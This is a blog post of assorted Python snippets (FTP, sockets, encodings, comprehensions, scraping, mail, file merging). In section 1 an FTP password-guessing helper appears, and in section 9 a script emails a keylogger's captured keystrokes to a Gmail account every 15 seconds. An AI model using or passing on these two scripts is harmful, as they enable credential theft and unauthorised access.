1. Python's ftplib module
Let's start with an example:
import ftplib

def ftp_anon(host):
    try:
        print '\n[+] Testing anonymous login...\n'
        ftp = ftplib.FTP()
        ftp.connect(host, 21, 10)
        ftp.login()
        ftp.retrlines('LIST')
        ftp.quit()
        print '\n[+] Anonymous login succeeded.'
    except ftplib.all_errors:
        print '\n[-] Anonymous login failed.'

def ftp_crack(host, user, pwd):
    try:
        ftp = ftplib.FTP()
        ftp.connect(host, 21, 10)
        ftp.login(user, pwd)
        ftp.retrlines('LIST')
        ftp.quit()
        print '\n[+] Login succeeded, user: ' + user + ' password: ' + pwd
    except ftplib.all_errors:
        pass
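ftp = ftplib.FTP()           # returns an instance of the FTP class
ftp.connect(host, 21, 10)    # connects to port 21 on host with a timeout of 10 seconds
ftp.retrlines('LIST')        # retrieves the directory/file listing in ASCII mode
Official documentation: 20.8. ftplib, FTP protocol client (Python 2.7.8 documentation)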
2. A brief introduction to Python's socket module
I. Getting the IP address(es) of a domain name with gethostbyname
host = socket.gethostbyname('ixyzero.com')
In [10]: socket.gethostbyname?
Type: builtin_function_or_method
String form: <built-in function gethostbyname>
Docstring:
gethostbyname(host) -> address
Return the IP address (a string of the form '255.255.255.255') for a host.
In [11]: socket.gethostbyname_ex?
Type: builtin_function_or_method
String form: <built-in function gethostbyname_ex>
Docstring:
gethostbyname_ex(host) -> (name, aliaslist, addresslist)
Return the true host name, a list of aliases, and a list of IP addresses,
for a host. The host argument is a string giving a host name or IP number.
In [12]: baidu = socket.gethostbyname('www.baidu.com')
In [13]: type(baidu)
Out[13]: str
In [14]: print baidu
220.181.112.244
In [15]: baidu2 = socket.gethostbyname_ex('www.baidu.com')
In [16]: type(baidu2)
Out[16]: tuple
In [17]: print baidu2
('www.a.shifen.com', ['www.baidu.com'], ['220.181.112.244', '220.181.111.188'])
In [18]: for item in baidu2[2]: print item
220.181.112.244
220.181.111.188
import socket
result = socket.getaddrinfo('www.baidu.com', None, 0, socket.SOCK_STREAM)
counter = 1
for item in result:
    print "%-2d: %s" % (counter, item[4])
    counter += 1
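The getaddrinfo call above returns one tuple per address, so the same address may appear more than once. A minimal Python 3 sketch of collecting only the distinct IP strings follows; the helper name resolve_addresses is hypothetical, and the numeric address is used so the example needs no DNS lookup.

```python
import socket

def resolve_addresses(host, port=None):
    """Return the sorted, de-duplicated IP strings that getaddrinfo reports for host."""
    infos = socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM)
    # Each entry is (family, type, proto, canonname, sockaddr); sockaddr[0] is the IP string.
    return sorted({info[4][0] for info in infos})

# A numeric address is resolved locally, so this also works offline.
print(resolve_addresses('127.0.0.1'))
```

Passing a host name such as 'www.baidu.com' works the same way, but the result then depends on the resolver.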
3. De-duplicating/counting and sorting with Python dictionaries
def get_counts(sequence):
    counts = {}
    for x in sequence:
        if x in counts:
            counts[x] += 1
        else:
            counts[x] = 1
    return counts
####
from collections import defaultdict
def get_counts2(sequence):
    counts = defaultdict(int)
    for x in sequence:
        counts[x] += 1
    return counts
####
dict_str = {'blue':'[email protected]', 'allen':'[email protected]', 'sophia':'[email protected]', 'ceen':'[email protected]'}
print dict_str
# Sort by key
print sorted(dict_str.items(), key=lambda d:d[0])
# Sort by value
print sorted(dict_str.items(), key=lambda d:d[1])
for key, value in dict_str.items():
    print key, value
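The counting and sorting steps above can also be combined with collections.Counter from the standard library. This is a Python 3 sketch rather than the author's code; top_counts and the sample list are hypothetical.

```python
from collections import Counter

def top_counts(sequence, n=None):
    """Count the items and return (item, count) pairs, most frequent first."""
    return Counter(sequence).most_common(n)

words = ['a', 'b', 'a', 'c', 'a', 'b']
print(top_counts(words))       # every item with its count
print(top_counts(words, 1))    # only the most frequent item
print(sorted(set(words)))      # de-duplicated and sorted
```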
4. Functions are objects in Python too
#### Functions are objects too ####
states = [' Alabama ', 'Georgia!', 'Georgia', 'georgia', 'south carolina##', ' West virginia?', 'New York .', 'China.', 'Beijing...']
import re
def clean_strings(strings):
    result = []
    for value in strings:
        value = value.strip()
        value = re.sub('[!#?]', '', value)
        value = value.title()
        result.append(value)
    return result
clean_strings(states)

def remove_punctuation(value):
    return re.sub('[!?#]', '', value)

# The cleaning steps are ordinary objects, so they can be stored in a list
clean_ops = [str.strip, remove_punctuation, str.title]

def clean_strings2(strings, ops):
    result = []
    for value in strings:
        for function in ops:
            value = function(value)
        result.append(value)
    return result
clean_strings2(states, clean_ops)
map(remove_punctuation, states)  # the built-in map function is really handy!
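Because functions are objects, a list of operations like the one above can also be folded into a single callable. The following Python 3 sketch uses functools.reduce; the compose helper is hypothetical and not part of the original snippet.

```python
import re
from functools import reduce

def remove_punctuation(value):
    return re.sub('[!?#]', '', value)

def compose(*functions):
    """Return one function that applies the given functions from left to right."""
    return lambda value: reduce(lambda acc, func: func(acc), functions, value)

clean = compose(str.strip, remove_punctuation, str.title)
print([clean(s) for s in [' Alabama ', 'Georgia!', 'south carolina##']])
```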
5. Comprehensions in Python {awesome!}
# List comprehensions
strings = ['a', 'as', 'a', 'bad', 'boy', 'Python']
[x.upper() for x in strings]
[x.upper() for x in strings if len(x)>2]
# Dict comprehensions
dict_map = {key:value for key, value in enumerate(strings)}
dict_map = dict((value, key) for key, value in enumerate(strings))
def file_2_dict(fileName):
    return {k.strip():v.strip() for k, v in (l.split('=') for l in open(fileName))}
# Set comprehensions
set_map = {key for key in strings}
# Nested list comprehensions
all_data = [['Tom', 'Jerry', 'Lily', 'Lucy', 'Hello,world', 'Jefferson', 'Steven', 'Joe', 'Bill'], ['Susie', 'Cookie', 'Qunar', 'Baidu', 'Notepad', 'Apple', 'Alibaba']]
names_of_interest = []
for names in all_data:
    enough = [name for name in names if name.count('e')>2]
    names_of_interest.extend(enough)
names2 = [name for names in all_data for name in names if name.count('e') > 2]
names3 = [name for names in all_data for name in names]
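file_2_dict above raises a ValueError on blank lines or on values that themselves contain '='. A slightly more forgiving Python 3 sketch of the same dict comprehension follows; lines_to_dict and the sample lines are hypothetical.

```python
def lines_to_dict(lines):
    """Build a dict from 'key=value' lines, skipping lines without '='."""
    # split('=', 1) splits on the first '=' only, so values may contain '='.
    pairs = (line.split('=', 1) for line in lines if '=' in line)
    return {key.strip(): value.strip() for key, value in pairs}

sample = ['host = example.com\n', '\n', 'path=/a=b\n']
print(lines_to_dict(sample))
```

An open file object can be passed in place of the list, since iterating over it also yields lines.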
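6. Python's encode and decode methods
First, a wrapper function for Windows that avoids garbled output:
import sys
def encode(s):
    return s.decode('utf-8').encode(sys.stdout.encoding, 'ignore')
This function first decodes the given string s from UTF-8 and then encodes it with the terminal's default character encoding; the result displays well in Windows terminals.
Python's built-in encode() method encodes a string with the encoding named by the encoding argument. The errors argument selects the error-handling scheme.
Syntax: str.encode(encoding='UTF-8', errors='strict')
encoding: the encoding to use, such as "UTF-8".
errors: the error-handling scheme. The default is 'strict', meaning that an encoding error raises a UnicodeError. Other possible values are 'ignore', 'replace', 'xmlcharrefreplace', 'backslashreplace', and any name registered via codecs.register_error().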
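To make the effect of the errors argument concrete, here is a small Python 3 sketch (in Python 3 the text type is str and encode returns bytes). The sample string is only an illustration.

```python
text = '中国abc'

# Each handler deals differently with characters the ASCII codec cannot represent.
for handler in ('ignore', 'replace', 'xmlcharrefreplace', 'backslashreplace'):
    print(handler, text.encode('ascii', errors=handler))

try:
    text.encode('ascii')  # the default is errors='strict'
except UnicodeEncodeError as exc:
    print('strict raised:', exc.reason)
```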
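Python scripts that deal with character encodings often add the following at the top:
import sys
reload(sys)
sys.setdefaultencoding('utf8')
In Python 2.5 and later, sys.setdefaultencoding is deleted once the interpreter has initialized, so we have to call reload(sys) to get it back and then set the default encoding by hand.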
In [26]: import sys
In [27]: print sys.stdout.encoding
cp936
In [28]: a = 'string...'
In [29]: a.encode?
Type: builtin_function_or_method
String form: <built-in method encode of str object at 0x033E41C0>
Docstring:
S.encode([encoding[,errors]]) -> object
Encodes S using the codec registered for encoding. encoding defaults
to the default encoding. errors may be given to set a different error
handling scheme. Default is 'strict' meaning that encoding errors raise
a UnicodeEncodeError. Other possible values are 'ignore', 'replace' and
'xmlcharrefreplace' as well as any other name registered with
codecs.register_error that is able to handle UnicodeEncodeErrors.
When no encoding is given, encode uses the system default encoding; with the default 'strict' error handling this may raise a UnicodeEncodeError.
In [30]: s = '中国'
In [31]: print s
涓浗
In [32]: type(s)
Out[32]: str
In [33]: repr(s)
Out[33]: "'\xe4\xb8\xad\xe5\x9b\xbd'"
In [34]: s.en
s.encode s.endswith
In [34]: s.encode('gb2312')
---------------------------------------------------------------------------
UnicodeDecodeError Traceback (most recent call last)
<ipython-input-34-d73c576b1830> in <module>()
----> 1 s.encode('gb2312')
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe4 in position 0: ordinal not in range(128)
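'''
The exception is raised because Python first decodes s to unicode automatically and only then encodes it to gb2312. The decoding is implicit and we did not name a codec, so Python uses the one reported by sys.getdefaultencoding(). In most cases that is ASCII, so the call fails whenever s contains non-ASCII bytes.
'''
In [35]: s.decode('utf-8').encode('gb2312')
Out[35]: '\xd6\xd0\xb9\xfa'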
In [36]: sys.stdout.encoding
Out[36]: 'cp936'
In [37]: s.decode('utf-8')
Out[37]: u'\u4e2d\u56fd'
In [38]: s.decode('utf-8').encode('utf-8')
Out[38]: '\xe4\xb8\xad\xe5\x9b\xbd'
In [39]: s.decode?
Type: builtin_function_or_method
String form: <built-in method decode of str object at 0x034F39C0>
Docstring:
S.decode([encoding[,errors]]) -> object
Decodes S using the codec registered for encoding. encoding defaults
to the default encoding. errors may be given to set a different error
handling scheme. Default is 'strict' meaning that encoding errors raise
a UnicodeDecodeError. Other possible values are 'ignore' and 'replace'
as well as any other name registered with codecs.register_error that is
able to handle UnicodeDecodeErrors.
When no codec is given, Python decodes with the one reported by sys.getdefaultencoding(). In most cases that is ASCII, so decoding fails whenever s contains non-ASCII bytes.
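The explicit decode-then-encode step from the session above looks like this in Python 3, where bytes and str are separate types and no implicit ASCII decoding takes place. The transcode helper is a hypothetical name; the byte values are the ones shown in the session.

```python
raw = b'\xe4\xb8\xad\xe5\x9b\xbd'  # the UTF-8 bytes from the session above

def transcode(data, source='utf-8', target='gb2312'):
    """Decode bytes with an explicit codec, then encode to the target codec."""
    return data.decode(source).encode(target)

print(transcode(raw))

try:
    raw.decode('ascii')  # naming the wrong codec fails loudly
except UnicodeDecodeError as exc:
    print('ascii decode failed:', exc.reason)
```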
7. An improved version of Python's string split function
def tsplit(string, delimiters):
    """Behaves like str.split but supports multiple delimiters."""
    delimiters = tuple(delimiters)
    stack = [string,]
    for delimiter in delimiters:
        for i, substring in enumerate(stack):
            substack = substring.split(delimiter)
            # Replace the i-th piece with the pieces it was split into
            stack.pop(i)
            for j, _substring in enumerate(substack):
                stack.insert(i+j, _substring)
    return stack
####
s = 'thing1,thing2/thing3-thing4'
print tsplit(s, (',', '/', '-')) # ['thing1', 'thing2', 'thing3', 'thing4']
print tsplit('你好,Python,yoyo-checknow. Justdoit!', (',', ',', '.')) # ['\xe4\xbd\xa0\xe5\xa5\xbd', 'Python', 'yoyo-checknow', ' Justdoit!']
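For comparison, the same multi-delimiter split can be sketched with re.split from the standard library. This Python 3 version is an alternative technique, not the tsplit implementation above; tsplit_re is a hypothetical name.

```python
import re

def tsplit_re(string, delimiters):
    """Split string on any of the given delimiters using one regular expression."""
    # re.escape keeps delimiters such as '.' from being treated as regex syntax.
    pattern = '|'.join(re.escape(d) for d in delimiters)
    return re.split(pattern, string)

print(tsplit_re('thing1,thing2/thing3-thing4', (',', '/', '-')))
```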
8. Downloading code from OSChina with Python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import re, urllib, sys, time

def main():
    # Pose as a browser
    headers = ('User-Agent','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)')
    opener = urllib.URLopener()
    opener.addheaders = [headers]
    # Loop over the list pages
    for page in range(1,29):
        url = "http://www.oschina.net/code/list/7/python?show=time&p=" + str(page)
        data = opener.open(url).read()
        data = data.decode('UTF8')
        # Extract the article URLs
        url_list = re.findall(re.compile(r'<a href="(.*)" target="_blank" title='), data)
        # Extract the article titles
        post_list = re.findall(re.compile(r'"_blank" title="(.*)">'), data)
        for i in range(len(url_list)):
            reload(sys)
            sys.setdefaultencoding('utf-8')
            post_data = opener.open(url_list[i]).read()
            post_data = post_data.decode('UTF8')
            # I am new to re, so this is a simple workaround suggested by an expert:
            # replace newlines with AaA, then extract the article body
            x = post_data.replace('\n', 'AaA')
            post = re.match(r'.*<pre class="brush: python; auto-links: false; ">(.*)</pre', x)
            print(post_list[i])
            # This raised errors at first because some article pages contain no code, hence the try
            try:
                # Name the file after the article title
                post_name = re.sub('[/:.* ]', '_', post_list[i])
                f = open(r'oschina/%s.py' % post_name, 'w')
                post = post.group(1).replace('AaA', '\n')
                f.write(post)
                f.close()
            except AttributeError:
                print(post_list[i] + ":null")
            time.sleep(1)
    print("That's all!")

if __name__ == '__main__':
    main()
Original link: python 下载oschina python代码 (Downloading OSChina's Python code with Python)
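The newline-to-AaA workaround in the script exists because '.' does not match newlines by default. A possible alternative, sketched here in Python 3, is the re.DOTALL flag with a non-greedy group. The sample HTML string and the extract_code helper are hypothetical, and the real page markup may differ.

```python
import re

# re.DOTALL lets '.' match newlines; '(.*?)' stops at the first closing </pre>.
PRE_BLOCK = re.compile(r'<pre class="brush: python[^"]*">(.*?)</pre>', re.DOTALL)

def extract_code(html):
    """Return the contents of the first matching <pre> block, or None if there is none."""
    match = PRE_BLOCK.search(html)
    return match.group(1) if match else None

sample = '<div><pre class="brush: python; auto-links: false; ">print(1)\nprint(2)</pre></div>'
print(extract_code(sample))
print(extract_code('<p>no code here</p>'))
```

Returning None for pages without code replaces the AttributeError handling in the script with an explicit check.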
9. Sending email with Python
#!/usr/bin/env python
#-*- coding: utf8 -*-
'''
Command-line program for sending mail (attachments are supported)
'''
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import sys

def helpinfo():
    print '''
    Usage: pymail -u user@domain -p passwd -h smtp server host -t to who [-a attachment file path] [-n attachment name]
    Usage: email content use . to end
    -h specify the smtp server host
    -u the user to log in to the smtp server as; must include its domain
    -p the password of the smtp user
    -t the email recipient; separate multiple addresses with ','
    -s the email subject
    -a add an attachment
    -n specify the attachment name in the email
    '''

options = ['-t', '-a', '-n', '-h', '-u', '-p', '-s']  # all options
argvnum = len(sys.argv)  # number of command-line arguments

# Check the command-line arguments
for i in range(argvnum):
    if (i % 2 != 0):
        if (sys.argv[i] not in options):
            print 'Unknown option ', sys.argv[i], ', Please use -h see help!'
            sys.exit(3)

# Show the help when there are no arguments or when -h is the only argument
if len(sys.argv) < 2 or sys.argv[1:] == ['-h']:
    helpinfo()
    sys.exit(0)

# Check the -n argument
if ('-n' in sys.argv) and ('-a' not in sys.argv):
    print 'Error: option "-n" must be used together with -a'
    sys.exit(2)

# Read the value of each argument
try:
    tmpmailto = sys.argv[sys.argv.index('-t') + 1]
    if ',' in tmpmailto:
        mailto = tmpmailto.split(',')
    else:
        mailto = [tmpmailto,]
except ValueError:
    print 'Error: need Mail Recipient'
    sys.exit(1)

haveattr = True
try:
    attrpath = sys.argv[sys.argv.index('-a') + 1]
    try:
        attrname = sys.argv[sys.argv.index('-n') + 1]
    except ValueError:
        attrname = attrpath.split('/')[-1]
except (ValueError, IndexError):
    attrname = None
    haveattr = False
    attrpath = None

try:
    mail_host = sys.argv[sys.argv.index('-h') + 1]
except ValueError:
    print 'Warning: no smtp server specified, using 127.0.0.1'
    mail_host = '127.0.0.1'

try:
    mail_useremail = sys.argv[sys.argv.index('-u') + 1]
except ValueError:
    print 'Warning: no user specified, using root'
    mail_useremail = 'root@localhost'

try:
    mail_sub = sys.argv[sys.argv.index('-s') + 1]
except (ValueError, IndexError):
    mail_sub = 'No Subject'

mail_user = mail_useremail.split('@')[0]
mail_postfix = mail_useremail.split('@')[1]

try:
    mail_pass = sys.argv[sys.argv.index('-p') + 1]
except ValueError:
    mail_pass = ''

# Define the function that sends the mail
def send_mail(to_list, sub, content, haveattr, attrpath, attrname):
    me = mail_user + "<" + mail_user + "@" + mail_postfix + ">"
    # Check whether there is an attachment
    if (haveattr):
        if (not attrpath):
            print 'Error : no input file of attachments'
            return False
        # With an attachment, create a multipart instance
        msg = MIMEMultipart()
        # Build the attachment
        att = MIMEText(open(attrpath, 'rb').read(), 'base64', 'utf8')
        att["Content-Type"] = 'application/octet-stream'
        att["Content-Disposition"] = 'attachment;filename="' + attrname + '"'
        msg.attach(att)
        msg.attach(MIMEText(content))
    else:
        # Otherwise create a plain-text instance
        msg = MIMEText(content)
    # Mail headers
    msg['Subject'] = sub
    msg['From'] = me
    msg['To'] = ", ".join(to_list)  # address lists in headers are comma-separated
    try:
        # Send the mail
        s = smtplib.SMTP()
        s.connect(mail_host)
        if (mail_host != '127.0.0.1'):
            s.login(mail_user, mail_pass)
        s.sendmail(me, to_list, msg.as_string())
        s.close()
        return True
    except Exception, e:
        print str(e)
        return False

if __name__ == '__main__':
    try:
        content = ''
        while True:
            c = raw_input('')
            if c == '.':
                break
            content += c + '\n'
    except EOFError:
        for line in sys.stdin:
            content += line
    if send_mail(mailto, mail_sub, content, haveattr, attrpath, attrname):
        print "Success"
    else:
        print "Failed"
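The message-building part of send_mail can be tried without an SMTP server. The following Python 3 sketch uses email.message.EmailMessage from the standard library instead of the MIMEText/MIMEMultipart classes above; build_message and the example addresses are hypothetical, and nothing is sent.

```python
from email.message import EmailMessage

def build_message(sender, recipients, subject, body, attachment=None, filename=None):
    """Build a message with an optional binary attachment, without sending it."""
    msg = EmailMessage()
    msg['From'] = sender
    msg['To'] = ', '.join(recipients)
    msg['Subject'] = subject
    msg.set_content(body)
    if attachment is not None:
        # Adding an attachment turns the message into multipart/mixed.
        msg.add_attachment(attachment, maintype='application',
                           subtype='octet-stream', filename=filename)
    return msg

msg = build_message('root@localhost', ['a@example.com', 'b@example.com'],
                    'No Subject', 'hello\n', attachment=b'\x00\x01', filename='data.bin')
print(msg['To'])
print(msg.get_content_type())
```

The resulting object could then be handed to smtplib.SMTP.send_message, which takes the sender and recipients from the headers.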
#!/usr/bin/env python
#coding=utf-8
import smtplib
from email.Message import Message
import time
import optparse
import sched

schedular = sched.scheduler(time.time, time.sleep)

def sendMail(emailTo, thePasswd):
    systemTime = time.strftime('%Y-%m-%d-%T', time.localtime(time.time()))
    try:
        # "/root/.secret-keys.log" is the key logger's output file; change it to match your own output file
        fileObj = open("/root/.secret-keys.log", "r")
        content = fileObj.read()
    except:
        print "Cannot read file\n"
        exit()
    message = Message()
    message['Subject'] = 'Log Keys'  # mail subject
    message['From'] = "[email protected]"
    message['To'] = emailTo
    message.set_payload("Current time: " + systemTime + "\n" + content)  # mail body
    msg = message.as_string()
    smtp = smtplib.SMTP("smtp.gmail.com", port=587, timeout=20)
    #smtp.set_debuglevel(1)  # enable debug mode
    smtp.starttls()  # use a secure connection
    smtp.login(emailTo, thePasswd)
    smtp.sendmail("[email protected]", emailTo, msg)
    time.sleep(5)  # avoid calling quit() before the mail has been sent
    smtp.quit()

def perform(inc, emailTo, thePasswd):
    # Re-schedule itself first, then send, so the mail goes out every inc seconds
    schedular.enter(inc, 0, perform, (inc, emailTo, thePasswd))
    sendMail(emailTo, thePasswd)

def myMain(inc, emailTo, thePasswd):
    schedular.enter(0, 0, perform, (inc, emailTo, thePasswd))
    schedular.run()

if __name__ == "__main__":
    optObj = optparse.OptionParser()
    optObj.add_option("-u", dest="user", help="Gmail account")
    optObj.add_option("-p", dest="passwd", help="Gmail Passwd")
    (options, args) = optObj.parse_args()
    emailName = options.user
    emailPasswd = options.passwd
    myMain(15, emailName, emailPasswd)  # 15 is the interval in seconds; adjust it to your needs
10. Merging files
#!/usr/bin/env python
# coding=utf-8
import sys, os, msvcrt

def join(in_filenames, out_filename):
    out_file = open(out_filename, 'w+')
    err_files = []
    for file in in_filenames:
        try:
            in_file = open(file, 'r')
            out_file.write(in_file.read())
            out_file.write('\n\n')
            in_file.close()
        except IOError:
            print 'error joining: ', file
            err_files.append(file)
    out_file.close()
    print 'join completed. %d file(s) missed.' % len(err_files)
    print 'output file: ', out_filename
    if len(err_files) > 0:
        print 'missed files:'
        print '--------------------------------'
        for file in err_files:
            print file
        print '--------------------------------'

if __name__ == '__main__':
    print 'scanning...'
    folder = sys.argv[1]
    in_filenames = []
    for file in os.listdir(folder):
        # Use the full path so the script also works when run from another directory
        path = os.path.join(folder, file)
        if file.lower().endswith('[all].txt'):
            os.remove(path)
        elif file.lower().endswith('.txt'):
            in_filenames.append(path)
    if len(in_filenames) > 0:
        print '----------------------------------------'
        print '%d part(s) in total.' % len(in_filenames)
        print '----------------------------------------'
        book_name = raw_input('Enter the book name: ')
        print 'joining...'
        join(in_filenames, os.path.join(folder, book_name + '[ALL].txt'))
    else:
        print 'nothing found.'
    msvcrt.getch()
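The core of the merge can be sketched in Python 3 with context managers, so that every file is closed even when an error occurs. join_files and the temporary files are hypothetical; the interactive prompt and the Windows-only msvcrt call are left out.

```python
import os
import tempfile

def join_files(in_paths, out_path):
    """Concatenate the readable input files into out_path; return the paths that failed."""
    missed = []
    with open(out_path, 'w') as out_file:
        for path in in_paths:
            try:
                with open(path) as in_file:
                    out_file.write(in_file.read())
                    out_file.write('\n\n')
            except IOError:  # an alias of OSError in Python 3; covers missing files
                missed.append(path)
    return missed

# Demonstration in a throwaway directory.
workdir = tempfile.mkdtemp()
parts = []
for name, text in (('1.txt', 'one'), ('2.txt', 'two')):
    path = os.path.join(workdir, name)
    with open(path, 'w') as handle:
        handle.write(text)
    parts.append(path)
missing = os.path.join(workdir, 'absent.txt')
output = os.path.join(workdir, 'book[ALL].txt')
missed = join_files(parts + [missing], output)
print(missed)
```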
11. Getting a script's own file name in Python
There are two ways: __file__ and sys.argv[0]
# coding=utf-8
import sys
print __file__
print sys.argv[0]
text = open(__file__).read()
print text[:-1]
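Both __file__ and sys.argv[0] may hold a relative path or a path with directories, depending on how the script was started. A small Python 3 sketch of normalizing either one to a bare file name follows; script_name is a hypothetical helper.

```python
import os
import sys

def script_name(path):
    """Return the bare file name for a script path such as __file__ or sys.argv[0]."""
    return os.path.basename(os.path.abspath(path))

# In a script run from a file, script_name(__file__) should give the same answer.
print(script_name(sys.argv[0]))
```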
12. A few uses of the lxml module
from lxml.html import parse
from urllib2 import urlopen
parsed = parse(urlopen('http://finance.yahoo.com/q/op?s=AAPL+Options'))
doc = parsed.getroot()
links = doc.findall('.//a')
links[15:20]
lnk = links[2]
lnk.get('href')
lnk.text_content()
urls = [lnk.get('href') for lnk in doc.findall('.//a')]
tables = doc.findall('.//table')
rows = doc.findall('.//tr')
####
zparsed = parse(urlopen('http://ixyzero.com/blog/sitemap.html'))
zdoc = zparsed.getroot()
zurls = [lnk.get('href') for lnk in zdoc.findall('.//a')]
zlinks = zdoc.findall('.//a')
####
parseD = parse(urlopen('http://finance.yahoo.com/q/op?s=AAPL+Options'))
doc = parseD.getroot()
def _unpack(doc, kind='a'):
    elts = doc.findall('.//%s' % kind)
    return [val.get('href') for val in elts]
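When lxml is not installed, the href extraction above can be approximated with html.parser from the Python 3 standard library. This is a swapped-in technique, not lxml's API; LinkCollector, extract_links and the sample markup are hypothetical. Unlike the lxml list comprehension, this sketch skips anchors that have no href instead of returning None for them.

```python
from html.parser import HTMLParser

class LinkCollector(HTMLParser):
    """Collect the href attribute of every <a> tag that has one."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == 'a':
            href = dict(attrs).get('href')
            if href is not None:
                self.links.append(href)

def extract_links(html):
    collector = LinkCollector()
    collector.feed(html)
    return collector.links

page = '<a href="/a">A</a><a name="x">X</a><p><a href="http://example.com/">B</a></p>'
print(extract_links(page))
```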
13. Friend-link (blogroll) statistics
#!/usr/bin/env python
# coding=utf-8
from urlparse import urlparse
# Assumption: the snippet targets BeautifulSoup; with BeautifulSoup 3 import these names from BeautifulSoup instead
from bs4 import NavigableString, Tag

def affect(points, keep_ratio, ratio, power):
    # Always keep keep_ratio of the points; scale the rest by ratio ** power
    keep = points * keep_ratio
    if ratio >= 1.: return points
    return keep + (points - keep) * pow(ratio, power)

def calc_link_points(host, ul):
    # Simplified host: drop the subdomain part!
    parts = host.split('.')
    if parts[-2] in ('com','edu','net','gov','org'):
        host = '.'.join(host.split('.')[-3:])
    else:
        host = '.'.join(host.split('.')[-2:])
    link_density = linktext_count = totaltext_count = 0.001
    container_count = innerlink_count = 0.001
    for a in ul.findAll('a'):
        href = a.get('href', '')
        # Internal link
        if not href or not href.lower().startswith('http') or host in href:
            innerlink_count += 1
            continue
        # Path is too deep
        if urlparse(href)[2].strip('/').count('/') >= 1 or '?' in href:
            continue
        link_density += 1
        linktext_count += len(a.text)
        if '_blank' == a.get('target'):
            link_density += 1
    # Count the text in the container
    for t in ul.recursiveChildGenerator():
        if type(t) is NavigableString:
            totaltext_count += len(t)
        else:
            container_count += 1
    points = (link_density - innerlink_count) * 1000
    if points < 0: return 0
    points = affect(points, 0.1, linktext_count / totaltext_count, 2.)
    points = affect(points, 0.1, link_density / container_count, 1.)
    if points < 1000: points = 0
    return points
####
def find_text(body):
    candidates = []
    total_links = len(body.findAll('a')) + 0.001
    # Enumerate the text containers
    for tag in ('div', 'section', 'article', 'td', 'li', 'dd', 'dt'):
        for x in body.findAll(tag):
            if type(x) is not Tag: continue
            points = len(x.text[:100].encode('utf8')) * 1000
            points = affect(points, 0.1, 1 - len(x.findAll('a')) * 1. / total_links, 1.)
            candidates.append((points, x))
    # Sort and take the container with the highest score
    candidates.sort(reverse = True)
    if candidates:
        return candidates[0][1]
    return body
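The snippet is taken from "通过友情链接进行博客Feed的搜集,你的博客收录了吗" (collecting blog feeds through friend links; is your blog included?). I am still at the stage of understanding and learning it.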
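To see what affect does to a score, here is the function again as a Python 3 sketch with three worked calls. It always keeps keep_ratio of the points and scales the remainder by ratio ** power; the input values are made up for illustration.

```python
def affect(points, keep_ratio, ratio, power):
    """Keep keep_ratio of the points; scale the remainder by ratio ** power."""
    keep = points * keep_ratio
    if ratio >= 1.0:
        return points
    return keep + (points - keep) * pow(ratio, power)

print(affect(1000, 0.1, 0.5, 2.0))  # 100 + 900 * 0.5 ** 2 = 325.0
print(affect(1000, 0.1, 1.0, 2.0))  # a ratio of 1 or more leaves the score at 1000
print(affect(1000, 0.1, 0.0, 1.0))  # a ratio of 0 keeps only the guaranteed 100.0
```

A larger power therefore punishes low ratios harder, which is presumably why the link-text ratio uses 2 and the density ratio uses 1.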
14. Fetching a small number of search results through the Google API
#!/usr/bin/env python
import urllib
import simplejson
query = urllib.urlencode({'q':'ixyzero.com'})
url = 'http://ajax.googleapis.com/ajax/services/search/web?v=1.0&%s'%(query)
search_results = urllib.urlopen(url)
json = simplejson.loads(search_results.read())
print(json)
results = json['responseData']['results']
print len(results)
for i in results:
    print i['title'] + ": " + i['url']
2 comments on "一些Python片段_6" (Some Python snippets_6)
An implementation of URL de-duplication using Simhash
http://www.noblexu.com/%E5%88%A9%E7%94%A8Simhash%E5%81%9AURL%E5%8E%BB%E9%87%8D%E7%9A%84%E5%AE%9E%E7%8E%B0%E6%96%B9%E5%BC%8F/
Stop using setdefaultencoding('utf-8') immediately, and why
https://blog.ernest.me/post/python-setdefaultencoding-unicode-bytes
`
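Worst practice
Two major problems caused by sys.setdefaultencoding('utf-8')
In short, doing this makes some code behave strangely, and the strangeness is hard to fix; it lingers as an invisible bug. Two examples follow.
1. Encoding errors
2. Abnormal dictionary behavior
The root of the problem: strings in Python 2
To make its syntax look simple and easy to use, Python does many tricky things, and conflating byte strings with text strings is one of them.
In Python 2 there are three string types: unicode (text string), str (byte string, binary data), and basestring, the parent class of the first two.
Best practices
· Every text string should be of type unicode, not str. If you are handling text and its type is str, you are creating bugs.
· Convert explicitly whenever a conversion is needed. To decode bytes into text, use var.decode(encoding); to encode text into bytes, use var.encode(encoding).
· When reading data from outside, assume it is bytes and decode it into the text you need; likewise, when sending text to the outside, encode it into bytes first.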
`
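The third best practice quoted above (decode on input, work on text, encode on output) can be sketched in Python 3 as follows. The shout function and the in-memory streams are hypothetical stand-ins for a real file or socket.

```python
import io

def shout(stream_in, stream_out, encoding='utf-8'):
    """Read bytes, process them as text, and write bytes back out."""
    text = stream_in.read().decode(encoding)    # bytes -> text at the input boundary
    result = text.upper()                       # all processing happens on text
    stream_out.write(result.encode(encoding))   # text -> bytes at the output boundary

source = io.BytesIO('héllo 中国'.encode('utf-8'))
sink = io.BytesIO()
shout(source, sink)
print(sink.getvalue().decode('utf-8'))
```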
Why should we NOT use sys.setdefaultencoding(“utf-8”) in a py script?
https://stackoverflow.com/questions/3828723/why-should-we-not-use-sys-setdefaultencodingutf-8-in-a-py-script